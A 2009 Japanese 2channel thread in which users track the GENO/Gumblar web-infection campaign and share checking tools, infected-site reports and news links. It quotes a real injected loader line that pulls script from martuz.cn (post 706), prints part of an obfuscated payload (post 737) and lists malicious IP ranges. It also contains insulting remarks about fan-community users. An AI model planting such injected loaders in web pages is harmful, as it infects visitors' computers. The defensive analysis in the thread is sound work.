嘘でなければ大袈裟紛らわしいはおkみたいな
警戒するに越したことはないってことなのかね

647 :192.168.0.774:2009/05/19(火) 08:19:54 ID:dvS6mKF80
>>645
それなら良いんだけどね、JS切っても感染とか相当ヤバいと思っただけ

648 :192.168.0.774:2009/05/19(火) 08:21:04 ID:dvS6mKF80
>>646
把握した、ビックリして損した

649 :192.168.0.774:2009/05/19(火) 08:22:34 ID:J0ZI6SAR0
あっちを見てみた限りセキュ板とかにいる釣りが頑張ってるくさいから
あまり気にしない方がよさそう

650 :192.168.0.774:2009/05/19(火) 08:27:05 ID:tVLA0dSpO
なんかどこのスレでもスレヲチしたがる奴いるけど何がしたいんだ?

651 :192.168.0.774:2009/05/19(火) 08:27:12 ID:zf5ipXqL0
万が一の最悪の事態を想定して警戒しているんだろう
妄想のプロフェッショナル集団だからきっとそれも凄いんだろう

最初の頃は見てたが、疲れて今はもう見て無いから実際は知らん
もしかしたらホントに亜種でてんのかもしれね

652 :192.168.0.774:2009/05/19(火) 08:27:42 ID:fY+ivJ0Z0
>>635
テンプレセキュリティサイトに感謝しろよw
そして、それを貼ったオレにもww

653 :192.168.0.774:2009/05/19(火) 08:29:38 ID:B3ICcjEcO
腐女子が最低な人種だと分かった

654 :192.168.0.774:2009/05/19(火) 08:32:05 ID:4ApWvFvJ0
寝起きだからかJSってみて女子小学生を思い浮かべた俺は快調だな

655 :192.168.0.774:2009/05/19(火) 08:32:08 ID:ITr8Wn8j0
>>646
あんまりアレゲな質問が多くて
おめえそんなレベルならネサフしないほうがいいよマジ…ってなってるだけだよ
まとめ嫁で終わらない所だからだ

656 :192.168.0.774:2009/05/19(火) 08:35:35 ID:xlP+ulkj0
>>654
感染経路が女子小学生だと…!?

657 :192.168.0.774:2009/05/19(火) 08:36:24 ID:9pskhE2y0
ネット弁慶は脳内の発言で済ませとけ
2ちゃんねらは目糞と歯糞ほどしか違わん

658 :192.168.0.774:2009/05/19(火) 08:37:44 ID:RwBhxesIO
同人連中みたいに日常的にネット使うのにテンプレで分からんってのは同情の余地無し
ただ、時々ネットでmixi(笑)やらようつべ見る程度の一般人はadobeってなに?って状態だからな・・・
なんというか、知識より先にネットが普及しすぎだと思う

659 :192.168.0.774:2009/05/19(火) 08:41:12 ID:OVtR6PVz0
>>657
セキュリティスレ荒らしまわってた腐女子ちゃんか?
図星つかれて顔真っ赤なのかい?

660 :192.168.0.774:2009/05/19(火) 08:43:09 ID:ezD3dXSU0
せっかく有意義なスレなんだから

661 :192.168.0.774:2009/05/19(火) 08:43:49 ID:ULbvY9kM0
>>653
前スレ

960 名前:192.168.0.774[sage] 投稿日:2009/05/18(月) 15:02:13 ID:8q4bxpc+0
>>951
ありがとう!

昨日半年ぶりくらいにログインしたmixiにGENOの事書いたら
腐の方達からすごい質問攻め
「自分もよく解らないのでまとめwiki見たほうがいいですよ」と返信したら
二人程から
「なら書くな!」


泣いていい?

963 名前:192.168.0.774[sage] 投稿日:2009/05/18(月) 15:05:24 ID:k2CI1leb0
>>960
なんかよくわからんが、存分に泣くがいい。

964 名前:192.168.0.774[sage] 投稿日:2009/05/18(月) 15:05:43 ID:gw0F+TVl0
>>960
www

965 名前:192.168.0.774[sage] 投稿日:2009/05/18(月) 15:07:07 ID:xKJ07MeN0
>>960
怖いのう怖いのう

966 名前:192.168.0.774[sage] 投稿日:2009/05/18(月) 15:08:01 ID:wU1qChfhP
>>960の人気に嫉妬

967 名前:192.168.0.774[sage] 投稿日:2009/05/18(月) 15:08:46 ID:t3VCyTRM0
>>960
一緒に泣いてやるよ

970 名前:192.168.0.774[sage] 投稿日:2009/05/18(月) 15:10:37 ID:ImVScTUk0
       ○
       ノ|)
  _| ̄|○ <し
    ↑
   >>960

662 :192.168.0.774:2009/05/19(火) 08:48:41 ID:dP6MSivA0
マジでこんな人多いみたいよ。
わからないなら回線切って窓からry

リンク集に昨日追加したサイトでgeocitiesのところなんだが、
チェッカー通すと0%なのにソース見ると黒っぽいのがある。
詳しい方のチェックをお願いしたい。

663 :192.168.0.774:2009/05/19(火) 08:50:59 ID:Z7EfCv7N0
cmd.exeが動かなくなるってのはそもそもウイルス作者の想定した状況ではたぶんなくて
ウイルスインストール時に動くu.batがダメな終わり方をするせいで
cmd.exeがhookされたまま応答できなくなるってだけらしい

なのでver upされた最近のタイプではcmd.exeは動いて普通
cmd.exeが動くかどうか、ってのは感染の判断としては全く無意味になってると思うよ

664 :192.168.0.774:2009/05/19(火) 08:55:04 ID:r4NoFTbD0
>>661のやつ
俺もmixiにGENOの事書いたけど
詳しく書かずに不安な人は落ち着くまでネットにつながないことですね
って書いておいた

腐っぽい人が結構読みに来てたわw

665 :192.168.0.774:2009/05/19(火) 09:01:30 ID:mUWFiGrP0
基礎的なこともわかんない、調べない、努力しない人には回線切っとけが一番良策でしょうな

666 :192.168.0.774:2009/05/19(火) 09:03:55 ID:B3ICcjEcO
割れadobe製品使ってるからアップデートしないって同人絵描きが多数居るってマジか
救いようがねえな

667 :192.168.0.774:2009/05/19(火) 09:05:44 ID:OVtR6PVz0
割れ厨で情弱で自己中とか腐女子ってもう、どうしようもねえな

668 :192.168.0.774:2009/05/19(火) 09:07:36 ID:VTkqYj1BO
>>666
それだけは否定させてほしい……
大体はペンタブに付いてくるエレメンツ
もしくはアカデミックなんとか
多分だけど

669 :192.168.0.774:2009/05/19(火) 09:08:36 ID:Ajk1rC7V0
叩きレスは同人オチスレ辺りでやって欲しいさ

まだどう化けるかわからんヤツだし
一つはマトモなスレ残そうぜ
俺のPCの為にさ

670 :192.168.0.774:2009/05/19(火) 09:09:27 ID:i7nYInZQ0
>>668
多分がついたら逆効果
帰れw

671 :192.168.0.774:2009/05/19(火) 09:10:06 ID:BjBK7U3S0
yuuno●sakura●ne●jp
漫画家のサイト
チェッカーで1000%なんだけど既出?

672 :192.168.0.774:2009/05/19(火) 09:10:47 ID:ULbvY9kM0
>>665
これを機に とか思う人が少ないのかねぇ
今回の事が落ち着いたらそれで終わり みたいなのが多そう

673 :192.168.0.774:2009/05/19(火) 09:12:56 ID:i7nYInZQ0
>>672
全員とは言わないが、多くが今回のことでも対策しないまま、
また次の脅威に晒されるのは目に見えてますな

674 :192.168.0.774:2009/05/19(火) 09:13:03 ID:o4562oQV0
>>671
まだ、ソース見て
感染しているかどうか確かめないと。

Gumblaroidなんて名前にしても
検索されにくいので、GENOウィルスでいいじゃん。

675 :192.168.0.774:2009/05/19(火) 09:13:08 ID:rRnoh8950
>>666
それは本当。
でも最近は昔に比べればかなりマシになってる。

676 :192.168.0.774:2009/05/19(火) 09:15:24 ID:OVtR6PVz0
荒れるような書き込みしといてあれだけど、
このスレの人に迷惑掛かるからこれ以上荒れるような書き込みするのやめようぜ

677 :192.168.0.774:2009/05/19(火) 09:15:42 ID:zf5ipXqL0
ネ実板の方は、以前の垢ハックウイルスで学習していて
今回のことはそのくらいの対策普段から当然とか余裕たっぷりだったな

678 :192.168.0.774:2009/05/19(火) 09:16:18 ID:nMhXw8IP0
ソース見てもかなりやばそうだね
難読化されたjavascriptなんて全部黒でいいっしょ

679 :192.168.0.774:2009/05/19(火) 09:20:00 ID:rj7hKtd+0
>>671
今見に行ったら</head>と<body>の間に難読化されたjavasrciptが埋め込まれてた。
難読スクリプトを読み解く能力無いけど、たぶん黒

他のソースが綺麗にかかれてるのに、挿入されてるところだけ違和感ある書き方。

680 :192.168.0.774:2009/05/19(火) 09:21:33 ID:SSNngqzw0
>>671
感染してる

681 :192.168.0.774:2009/05/19(火) 09:22:47 ID:sOtpnrCJ0
いまリストに放り込みました。
ヲチスレの弗。インデックスはきれいですがTOPその他は黒いと思います。

682 :192.168.0.774:2009/05/19(火) 09:27:32 ID:B3ICcjEcO
亜種でクレカの情報抜くヤツが出たらオワタだな

683 :192.168.0.774:2009/05/19(火) 09:32:41 ID:IlBvShIz0
>>671
判定黒

>>662
genocitiesって、武蔵のとこ?
見に行く場所がわからないと調べようが無い


684 :192.168.0.774:2009/05/19(火) 09:34:22 ID:sjuhI8SBO
>>683
ちょw綴り

685 :192.168.0.774:2009/05/19(火) 09:36:27 ID:qAG1R1X30
>>641
何回か諌めたけどいつも「でも亜種が出たらどうするんだ」という奴が出てくるw
亜種はどのウイルスにもあるだろうよw

686 :192.168.0.774:2009/05/19(火) 09:36:47 ID:zNDjj7AG0
皆殺し都市ktkr

687 :192.168.0.774:2009/05/19(火) 09:37:30 ID:vSwxXbQJ0
>>671含め、黒と断定出来たURLはこちらへどうぞ
http://genolists.alink.uic.to/

チェッカーの精度も最近疑問視されてるから
できればJS切ったFxで直接手動でソース確認した方がいいね
まぁ自分も難読化されたJSコード読み解く能力はないので、見た目での判断だけになるけど

しかしそうなるとますます地道な作業だから、なかなかリスト増えないなw

688 :192.168.0.774:2009/05/19(火) 09:38:49 ID:Z7EfCv7N0
>>682
亜種も何も、現行のでもう抜かれてても全然おかしくないぞ
何してるのかすらまだ完全にはわかってないウイルスなんだ

689 :192.168.0.774:2009/05/19(火) 09:42:31 ID:JHO+uVsJ0
噂に尾ひれがつきすぎて
何のウイルスかちゃんと知ってる人とか少なそうだな

690 :192.168.0.774:2009/05/19(火) 09:44:56 ID:BjBK7U3S0
>>671をリンク集に追加しときました。

691 :192.168.0.774:2009/05/19(火) 09:44:59 ID:o4562oQV0
個人の対策は、2chや纏めサイトで何とかなるけど
サイト側のほうは、企業側が働きかけてくれないと
なかなかはかどらない。

692 :192.168.0.774:2009/05/19(火) 09:51:41 ID:mlQ2VeKdP
>>689
そんなの知らなくても、対策だけしっかりしてれば普通は十分だろ

693 :192.168.0.774:2009/05/19(火) 09:54:09 ID:TttMGD6fO
>>683
リンク集の感染疑い(未確認)に入ってる、個人サイト。
コメント欄にアドレス書いてるよ。

694 :192.168.0.774:2009/05/19(火) 09:54:51 ID:tVLA0dSpO
なんか同人サイトの感染探しはヲチスレの方で進んでるみたいだけど

695 :192.168.0.774:2009/05/19(火) 09:55:04 ID:IyKOpCbn0
>>667
精神病も追加して

696 :192.168.0.774:2009/05/19(火) 09:57:36 ID:8eXjFlyI0
セキュ板から逃げてきた('A`)
なんだよあそこ

http://www.broadband-xp.com/hidesource/escape.html
難読化(escape)処理された文字列はここで複合出来る。

あとは replace 関数を適当に読めば元のJavascriptが判る。

697 :192.168.0.774:2009/05/19(火) 10:02:45 ID:aO3N0VLz0
昨日の夜から23469や41470ポートのアタックが頻発してるんだけど
GENOのボットコマンドじゃないのかな

698 :192.168.0.774:2009/05/19(火) 10:11:33 ID:4qSJ+qty0
聖帝♂♂検索はサイト止めた。

699 :192.168.0.774:2009/05/19(火) 10:12:20 ID:SSNngqzw0
>>693
そのサイト空のHTMLかと思いきやjavaスクリプトonにすると見れるの今気付いた
とりあえずトップと01menu.htmlは感染してはいないな

700 :192.168.0.774:2009/05/19(火) 10:14:02 ID:TttMGD6fO
>>694
話が堂々巡りになって結局進んでない記がする…

701 :192.168.0.774:2009/05/19(火) 10:14:50 ID:DXUk3UnI0
http://www.alexa.com/search?q=gumblar.cn

alexaの人気サイトに絶賛ランクイン中w 現在588,338位
martuz.cnはランク外だな

martuz.cn、gumblar.cn、zlkon.lv、これ以降の最新サーバって何か判明してる?
最新はmartuz.cnでおk?

702 :192.168.0.774:2009/05/19(火) 10:16:24 ID:TttMGD6fO
>>699
なら自分の早とちりだったわけか。申し訳ない。
確認してくれてありがとう。

703 :192.168.0.774:2009/05/19(火) 10:18:30 ID:m3Ey5wlo0
>>701
>>627

704 :192.168.0.774:2009/05/19(火) 10:21:04 ID:/2sWrnMhO
>>700
初めて知った奴らが脊髄反射で「〜するにはどうしたら」「〜ですが大丈夫ですか」
とかしてレス数無駄に消費する傾向にあるからなぁ・・・

705 :192.168.0.774:2009/05/19(火) 10:28:45 ID:IlBvShIz0
>>693,699
変な難読化されたjavascriptが埋め込まれてる。
けど、全然タイプが違う
文字コード変換みたいなコード


706 :192.168.0.774:2009/05/19(火) 10:36:13 ID:DXUk3UnI0
>>703
おぉサンクス
一応alexaで全部確認してみたら、いまだアクセスがお盛んなのはmartuz.cnとgumblar.cnだな
まぁalexaが全てを把握してるわけじゃないけどw 目安程度には使えるw

>>671
ここもmartuz.cnに飛ぶんだな
"<script src=//m"+"artuz.cn/vid/?id="+j+"><\/script>"

707 :192.168.0.774:2009/05/19(火) 10:40:44 ID:m3Ey5wlo0
■GENOウィルスのチェックプログラム(簡易版)を書いてみた
Vista使いでUAC厨の私には全く関係の無い話のような気がするが、
いつUACを突破する亜種が出るかは分からない。
sqlsodbc.chmのファイルサイズで判定できるようなので、
そんなときのためにこんなバッチファイルを書いてみた。
以下のプログラムをテキストファイルにコピペして、
拡張子をbatにしてダブルクリックで実行すれば、
コマンドを勝手に実行し、最後にレポート書いて停止するものだ。
有効利用してください。
あと、バッチに関しては素人なので改造してくれるとうれしいなぁ。

以下略。

708 :192.168.0.774:2009/05/19(火) 10:43:05 ID:qdxUjeGQ0
>>705
普通のサイトのhtmlを難読化してあって
javaスクリプトをonにしていない人はサイトを閲覧できないようにしてある

709 :192.168.0.774:2009/05/19(火) 10:47:13 ID:+Nv0TkV90
株式会社アイマジックのページに対処法が載ってたので参考になれば
ttp://www.imagic.co.jp/info090514.html

710 :192.168.0.774:2009/05/19(火) 10:53:29 ID:YPsJVP/N0
感染確認プログラムってニーズあるのかな…っていうのは、案外反応が薄い ここだけ見てる限り

711 :192.168.0.774:2009/05/19(火) 10:55:16 ID:m3Ey5wlo0
>>710
精度の高いプログラムは必要。
チェッカーは、どこまで正確だかわからない。

712 :192.168.0.774:2009/05/19(火) 10:55:32 ID:i7nYInZQ0
URLぶちこむとソースを簡単に見られる、ってだけのシンプルなヤツが一番使えるような

713 :192.168.0.774:2009/05/19(火) 10:56:19 ID:BfeDPikc0
うpされてもリンク先が怖くて踏めないw

714 :192.168.0.774:2009/05/19(火) 10:57:25 ID:tP4n383f0
vmで感染してみよっと

715 :192.168.0.774:2009/05/19(火) 10:58:37 ID:qdxUjeGQ0
malzillaというの使ってソース見てる

716 :192.168.0.774:2009/05/19(火) 10:58:51 ID:fY+ivJ0Z0
>>710
ニーズあるでしょ。ただ、検出精度が絶対でないから
反応が薄いんだと思う

717 :192.168.0.774:2009/05/19(火) 11:02:52 ID:jeFZakeZ0
>>712
だなぁ、欲を言えば難読化でよく使われる文の辺りに色付けして貰えりゃOK

718 :192.168.0.774:2009/05/19(火) 11:03:00 ID:4qSJ+qty0
DSiのブラウザーとソース表示のブックマークレットを使って確認してる。


719 :192.168.0.774:2009/05/19(火) 11:05:19 ID:i7nYInZQ0
>>717
理想的ですね

720 :192.168.0.774:2009/05/19(火) 11:07:31 ID:0Gld1tHJ0
body の直前で unescape と eval が入ってて変数名が大文字小文字混じり
これでいいと思う

721 :192.168.0.774:2009/05/19(火) 11:08:38 ID:hITb4yl00
テンプレ適当にいろんなスレに張った方がいいかな

722 :192.168.0.774:2009/05/19(火) 11:10:40 ID:nROd7T4M0
>>721
中身がどうだろうが、コピペ多投は2chにとっては基本迷惑行為=規制されても文句言えないだからやめとけ

723 :192.168.0.774:2009/05/19(火) 11:11:55 ID:m3Ey5wlo0
>>707,712
あと、先日から言われてました「Javascriptの勝手埋め込みによるトロイ」が、
指定のページに埋まっていたら赤くなる判定機能も付けました。

ひまぐらま「ポートちぇき」再開(仮設へ引越し)のお知らせ
ttp://blog.livedoor.jp/hpg/archives/50479373.html

724 :192.168.0.774:2009/05/19(火) 11:15:51 ID:m3Ey5wlo0
>>723
ソースちぇき(β版) - ひまぐらま[別館]
ttp://hpg2.me.land.to/srcchk1.html

あなたのホームページを 「ソースちぇき(β版)」 で 見てみよう
このページでは、アナタが指定したアドレス(ページ)を
あなたのパソコンに代わって取得し、ココに表示します。
ページの内容を、ただのHTMLソース(文字列)として表示しますので、
もしもJavascriptによるいたづらが仕組まれていても安心です。

あとオマケですが、表示するソースの中から、
『見ただけで感染する?ウイルス(Zlkon/Gumblar/Martuzなど)』 を
自動的に探して太字にする機能も付いてるので、
もし覚えの無いJavascriptが在れば、
そのページのソースファイルを、自分で直してみると良いかもしれません。

※この「ソースちぇき」では発見のお手伝いだけで、
実際にソースを手直しなどするのは管理者であるあなた自身です。

「ソースちぇき」は単に客観的にあなたのホームページを見て、
ソースを表示するだけの「簡易ソースチェッカー」です。

トロイ診断機能は、hpgの憶測によるカンタンな正規表現による検索に過ぎません
のであしからず(゚Д゚)スマンネ

あなたの回線環境やサーバの混み具合によっては1分以上かかることがありますので
リロードしないでね(´・ω・)オネガイ

725 :192.168.0.774:2009/05/19(火) 11:20:33 ID:lgWk0k6D0
こういうとき1CD linuxって便利だな
HDD外して光学ドライブだけにしてやれば絶対感染しないもんな


726 :192.168.0.774:2009/05/19(火) 11:21:54 ID:0Gld1tHJ0
その昔BIOSに感染する(ry

727 :192.168.0.774:2009/05/19(火) 11:24:33 ID:lgWk0k6D0
>>726
ああ昔はあったね
最近のママンは大丈夫


728 :192.168.0.774:2009/05/19(火) 11:25:56 ID:i7nYInZQ0
>>724
気軽に使えんがなww

729 :192.168.0.774:2009/05/19(火) 11:29:55 ID:pvTWguMW0
JSなしで感染する亜種が出たかどうかは知らんが
原理的にはJSなしでも感染する

730 :192.168.0.774:2009/05/19(火) 11:33:05 ID:0Gld1tHJ0
ブラウザのjsとPDFのjsは分けないとダメだろ

731 :192.168.0.774:2009/05/19(火) 11:35:49 ID:zf5ipXqL0
>>712
シンプルなのなら
view-source:これをURLの頭につければソース表示するぞ

732 :192.168.0.774:2009/05/19(火) 11:37:41 ID:lgWk0k6D0
ソースソース言っても感染したPCでアップしても何の解決にもならんよな
知識ない人はISPに電話して理由説明して自サイトのファイル全削除してもらった方が早いし確実だ
それから自分のPCのクリーンインスコ



733 :192.168.0.774:2009/05/19(火) 11:37:50 ID:ebHg3CWR0
>>634
exe拾ったなら、検体提出スレに持ち込んでくれないだろうか。検体くれー。

【鑑定目的禁止】検出可否報告スレ10
ttp://pc11.2ch.net/test/read.cgi/sec/1235459712/
【鑑定目的禁止】検出可否報告スレ11
ttp://pc11.2ch.net/test/read.cgi/sec/1242606390/

734 :192.168.0.774:2009/05/19(火) 11:38:22 ID:mlQ2VeKdP
>>720
>>166

735 :192.168.0.774:2009/05/19(火) 11:40:09 ID:lgWk0k6D0
ところで大手ニュースサイトでまもとに扱ってるとこってSo-netセキュリティ以外にある?
Yahooとか触れもしてないよな?

736 :192.168.0.774:2009/05/19(火) 11:40:15 ID:J0Kxa3Q90
セキュ板の方はもう駄目だな・・・ウィルスコードなんぞに質問殺到してる

737 :192.168.0.774:2009/05/19(火) 11:41:48 ID:G5tmYxTL0
今北産業
>>724
www.mikesquarter・com 完全にクロだけど検出しないね

(function(){var Fs6A='%';var vRjd=',76,61r,20,61,3d,22S,63,72ip,74Engine,22
,2c,62,3d,22,56e,72sion,28),2b,22,2c,6a,3d,2


738 :192.168.0.774:2009/05/19(火) 11:43:24 ID:jeFZakeZ0
>>737
その文書くなよw
またAvastがーとか煩いのが沸くんだから…

739 :192.168.0.774:2009/05/19(火) 11:43:25 ID:lgWk0k6D0
セキュ板はゲハと同じでメーカー間の罵り合いがメインみたいなもんだ

740 :192.168.0.774:2009/05/19(火) 11:43:41 ID:Sw53qn2c0
>>735
http://headlines.yahoo.co.jp/hl?a=20090514-00000010-maiall-sci
http://headlines.yahoo.co.jp/hl?a=20090515-00000013-zdn_ep-sci

741 :192.168.0.774:2009/05/19(火) 11:43:48 ID:RLcqjobb0
>735
日経ITproが少し。他はスラッシュドットジャパンくらい。

742 :192.168.0.774:2009/05/19(火) 11:44:11 ID:iuUi1XGl0
他所の板のことぐちぐち言うぐらいなら書き込み自重して欲しい、と思ってる人もいる

743 :192.168.0.774:2009/05/19(火) 11:44:30 ID:i7nYInZQ0
>>731
Firefoxのソース表示って画面右端で折り返ししないから見づらくてどうも
でもコレが一番楽だね。ツール開発者さんの鯖に負担もかけないし

744 :192.168.0.774:2009/05/19(火) 11:44:51 ID:zf5ipXqL0
>>732
ソースソースってのは閲覧したいサイトが安全か確認するためとか
疑惑のあったサイトを確認するために先にソース表示って話じゃないの?

745 :192.168.0.774:2009/05/19(火) 11:46:28 ID:m3Ey5wlo0
>>737
完全にはチェックできないから
試しに使ってみる程度でいいじゃない?

これで全てのトロイ系ウイルスが見つかるの?
見つかりません。全然見つかりません。
これはホームページのHTMLソースチェッカーです。
JSRedir-R(Zlkon/Gumblar/Martuz)の判定はあくまでもオマケです。

746 :192.168.0.774:2009/05/19(火) 11:46:53 ID:i7nYInZQ0
>>744
自分はそのつもりで話しておりました

747 :192.168.0.774:2009/05/19(火) 11:47:42 ID:qmbjopifP
>735
itmedia・日経BPが多少


748 :192.168.0.774:2009/05/19(火) 11:49:13 ID:G5tmYxTL0
>>745
ですなw


749 :192.168.0.774:2009/05/19(火) 11:50:14 ID:lgWk0k6D0
やっぱ一番突っ込んで書いてるのはSo-netだけか
ttp://www.so-net.ne.jp/security/news/view.cgi?type=2&no=1890
ttp://www.so-net.ne.jp/security/news/view.cgi?type=2&no=1884


750 :192.168.0.774:2009/05/19(火) 11:50:36 ID:4qSJ+qty0
ヘアーサロンジョイってもう対応済み?
コードが無いみたいなんだけど。


751 :192.168.0.774:2009/05/19(火) 11:52:59 ID:9IYXIU+f0
ttp://itpro.nikkeibp.co.jp/article/NEWS/20090515/330053/?ST=security

752 :192.168.0.774:2009/05/19(火) 11:53:29 ID:ap1eQf7N0
日本以外だと、どのニュースサイトが取り上げてる?

753 :192.168.0.774:2009/05/19(火) 11:55:24 ID:G5tmYxTL0
>>750
無いですね、ガセだったのか?

754 :192.168.0.774:2009/05/19(火) 11:56:21 ID:JHO+uVsJ0
>>753
いえ、昨日はトロイが検出されてました
詳しくはみてませんが

755 :192.168.0.774:2009/05/19(火) 11:56:34 ID:Sw53qn2c0
>>749
GENO自体じゃなくてGENOによるサイト改ざん情報ならいくらでもあるが

756 :192.168.0.774:2009/05/19(火) 11:56:38 ID:lgWk0k6D0
取り上げるなら、どこどこが感染してましたのでそこを見た人は感染してる疑いがあります、ってはっきり書かないと意味ないよな
だから二次感染が広がるんだろう


757 :192.168.0.774:2009/05/19(火) 11:56:39 ID:9IYXIU+f0
英ソフォス
ttp://www.sophos.com/blogs/gc/g/2009/05/14/malicious-jsredir-javascript-biggest-malware-threat-web/

758 :192.168.0.774:2009/05/19(火) 11:57:10 ID:abtxHDvw0
超やっつけ
http://end.if.land.to/geno.php?url=http://www.mikesquarter.com

フォームとかは作ってないから自分でurl書き換えて
ソース
http://end.if.land.to/geno.phps

759 :192.168.0.774:2009/05/19(火) 11:58:00 ID:RLcqjobb0
ノートン
 ttp://www.symantec.com/norton/security_response/writeup.jsp?docid=2009-051900-3410-99

760 :192.168.0.774:2009/05/19(火) 11:58:00 ID:Sw53qn2c0
http://news.google.com/news/search?um=1&ned=jp&hl=ja&q=%E4%B8%8D%E6%AD%A3%E3%82%A2%E3%82%AF%E3%82%BB%E3%82%B9+%E6%94%B9%E3%81%96%E3%82%93

761 :192.168.0.774:2009/05/19(火) 11:58:21 ID:lgWk0k6D0
>>755
それは有志による情報でしょ?
そんなん見てるのごく一部
Yahooクラスの大手ニュースサイトが具体的な感染サイトを掲載しないと意味がない

762 :192.168.0.774:2009/05/19(火) 12:09:39 ID:QXeKbW6W0
>>743
ViewSourceWith もしくは WebDeveloper を使えば、
好きなテキストエディタでソースを開けるぞ。

763 :192.168.0.774:2009/05/19(火) 12:10:46 ID:jeFZakeZ0
>>759
ノートン先生仕事したのか。
書いてある事からするとドロッパ(難読化スクリプト)じゃなくて本体のほうだね
他のベンダーもこれに続いてくれると良いんだが

764 :192.168.0.774:2009/05/19(火) 12:20:44 ID:BfeDPikc0
>>463の書式が統一されていなかったのでやってみた

58.65.232.0 - 58.65.239.255 58.65.232.0/21
61.139.0.0 - 61.139.127.255 61.139.0.0/17
61.219.39.0 - 61.219.39.255 61.219.39.0/24
61.235.117.0 - 61.235.117.255 61.235.117.0/24
61.237.236.0 - 61.237.236.255 61.237.236.0/24
63.146.2.0 - 63.146.2.255 63.146.2.0/24
69.46.0.0 - 69.46.31.255 69.46.0.0/19
74.220.215.0-74.220.215.255 74.220.215.0/24
78.109.16.0 - 78.109.31.255 78.109.16.0/20
78.159.112.0 - 78.159.115.255 78.159.112.0/22
82.146.48.0 - 82.146.55.255 82.146.48.0/21
83.68.16.0 - 83.68.16.255 83.68.16.0/24
85.12.43.0 - 85.12.43.255 85.12.43.0/24
85.14.6.0 - 85.14.6.255  85.14.6.0/24
85.17.0.0 - 85.17.255.255 85.17.0.0/16
85.214.90.0 - 85.214.90.255 85.214.90.0/24
91.211.64.0 - 91.211.65.255 91.211.64.0/23
91.212.41.0 - 91.212.41.255 91.212.41.0/24
91.212.65.0 - 91.212.65.255 91.212.65.0/24
91.212.41.0- 91.212.41.255 91.212.41.0/24
91.212.41.0 - 91.212.41.255 91.212.41.0/24
94.232.248.0 - 94.232.255.255 94.232.248.0/21
94.229.64.0 - 94.229.79.255 94.229.64.0/20
94.247.2.0 - 94.247.3.255 94.247.2.0/23
194.165.4.0 - 194.165.5.255 194.165.4.0/23
195.2.252.0 - 195.2.253.255 195.2.252.0/23
195.216.160.0 - 195.216.191.255 195.216.160.0/19
206.44.0.0 - 206.44.255.255 206.44.0.0/16
209.44.100.0 - 209.44.100.255 209.44.100.0/24
209.44.126.0 - 209.44.126.255 209.44.126.0/24
209.62.7.0 - 209.62.7.255 209.62.7.0/24
209.102.247.0 - 209.102.247.255 209.102.247.0/24
209.250.241.0 - 209.250.241.255 209.250.241.0/24
209.205.192.0 - 209.205.223.255 209.205.192.0/19
209.205.224.0 - 209.205.239.255 209.205.224.0/20
211.90.0.0 - 211.97.255.255 211.90.0.0/15 & 211.92.0.0/14 & 211.96.0.0/15
213.182.192.0 - 213.182.223.255 213.182.192.0/19
218.90.0.0 - 218.94.255.255 218.90.0.0/15 & 218.92.0.0/15 & 218.94.0.0/16
78.159.112.0 - 78.159.115.255 78.159.112.0/22
221.5.0.0 - 221.5.127.255 221.5.0.0/17
91.212.41.0 - 91.212.41.255 91.212.41.0/24
95.129.144.0 - 95.129.144.255 95.129.144.0/24
95.129.145.0 - 95.129.145.255 95.129.145.0/24

メモ帳でタブ等に置き換えられるように範囲とCIDRとの間は全角スペースにしてる

765 :192.168.0.774:2009/05/19(火) 12:23:36 ID:kGobtrBpP
ちょい報告、ガイシュツだったらすまん。

全ての対策をおこなったPCでGENO感染したサイトを訪問
 ↓
avast!が遮断
 ↓
念のためavast!およびカスペ・バスターのオンラインでフルスキャン
 ↓
C:\WINDOWS\system32内に「system32.exe」が作成されているのを発見
 ↓
「system32.exe」の更新日時は2005年だが、作成日時はGENO感染サイト訪問時
 ↓
ヒューリスティック予測で「system32.exe」の疑わしい挙動を検出


とりあえず「system32.exe」は除去したが、まだ何かが潜んでいそうだ。
おまえらもC:\WINDOWS\system32を調べてみれ
ちなみに既知の「system32.exe」を作るワームとは別物。

766 :192.168.0.774:2009/05/19(火) 12:32:23 ID:8FgxAqIl0
未感染PCではSystem32.exeは存在しないな

767 :192.168.0.774:2009/05/19(火) 12:33:27 ID:3D8bfAV20
素人質問ですみません
ずっと疑問に思ってたことなんですが
ブラウザのJavascriptを切りさえすれば
他の対策は取っていなかったとしても
ウィルスのJavascriptはJavascriptなんだから
機能しないものなんじゃないんですか?


768 :192.168.0.774:2009/05/19(火) 12:34:06 ID:MqVcBH/v0
NoScript導入してるのにScript実行されてマジ焦ったwwwwwwwwwwwww

あるページで○○.comを許可、その状態で裏にしてた
上に出てた漫画化のページクリック、裏にいた火狐起動でもNoScriptのブロック画面が出ない…
ソース見たら黒…

これ一体どういうことなんだろ?NoScriptはどっか一時的に許可すると他のまで許可されちゃうの?

でもReader8にFlash未導入環境だったの思い出して安心してる…大丈夫だよね…

769 :192.168.0.774:2009/05/19(火) 12:34:56 ID:tz5TANvX0
>>765
うちのにはいなかった(踏んでないから当然か)
それは検出したの?

770 :192.168.0.774:2009/05/19(火) 12:36:54 ID:EYOlKSak0
ウチの未感PCにもsystem32.exe存在せず

771 :192.168.0.774:2009/05/19(火) 12:37:02 ID:guqo9j390
>>769
avast、カスペ、バスターは検出できなかった。
とりあえず検体は各ベンダの送っといた。

772 :192.168.0.774:2009/05/19(火) 12:37:18 ID:Ni9zQrjI0
>>765
物が残してあるならVirusTotal なりでチェックして結果を。
んで怪しそうなら検体スレ行って検体提供してら

773 :192.168.0.774:2009/05/19(火) 12:39:01 ID:xNz70xs60
それは前から別なの踏んでたんだと思うよ

774 :192.168.0.774:2009/05/19(火) 12:39:24 ID:Sw53qn2c0
>>761
http://news.google.com/news/search?um=1&ned=jp&hl=ja&q=%E4%B8%8D%E6%AD%A3%E3%82%A2%E3%82%AF%E3%82%BB%E3%82%B9+%E6%94%B9%E3%81%96%E3%82%93

775 :192.168.0.774:2009/05/19(火) 12:39:32 ID:4qSJ+qty0
現状コードが見当たらないサイト

無地TシャツとオリジナルTシャツの卸売専門店/問屋街

北川大介 トップページのみ白

ペットの姓名判断のサイト
主上支局
livmail

776 :192.168.0.774:2009/05/19(火) 12:40:13 ID:9mkDV7BY0
>>768
>NoScriptはどっか一時的に許可すると他のまで許可されちゃうの?
それはないでしょw

間違って「すべてのサイトを許可」でも押しちゃったんじゃない?

777 :192.168.0.774:2009/05/19(火) 12:43:05 ID:guqo9j390
>>772
VirusTotalを失念していた、すまん。
http://www.virustotal.com/jp/analisis/138404683259a191c78642e22bdaf4ab

結果: 12/40 (30.00%)
カスペもavastも未対応のトロイらしい。


778 :192.168.0.774:2009/05/19(火) 12:45:43 ID:Tp1gTLQl0
>>776
